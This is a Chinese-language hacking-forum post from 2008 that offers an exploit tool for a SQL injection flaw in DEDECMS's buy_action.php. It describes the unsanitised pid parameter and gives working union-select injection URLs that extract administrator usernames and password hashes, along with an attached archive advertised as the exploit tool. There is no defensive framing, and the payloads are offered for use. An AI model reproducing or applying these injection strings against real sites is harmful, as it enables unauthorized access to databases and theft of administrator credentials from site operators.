找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
NB5牛论坛»首页 技术交流区 网安技术 DEDECMS最新注射漏洞利用工具
返回列表 发新帖
查看: 1563|回复: 0

DEDECMS最新注射漏洞利用工具

[复制链接]
maya66

15

主题

74

回帖

109

牛毛

一级牛人

积分
109
发表于 2008-1-17 17:58:56 | 显示全部楼层 |阅读模式 来自 安徽省亳州市
软件利用:
漏洞出现在buy_action.php 没有对pid传递进行足够的重视
导致出现SQL注射问题!
注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
工具, 漏洞, 注射
1.JPG

DEDECMS最新注射漏洞利用工具.rar

654 KB, 下载次数: 14
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-27 05:26 , Processed in 0.132999 second(s), 30 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表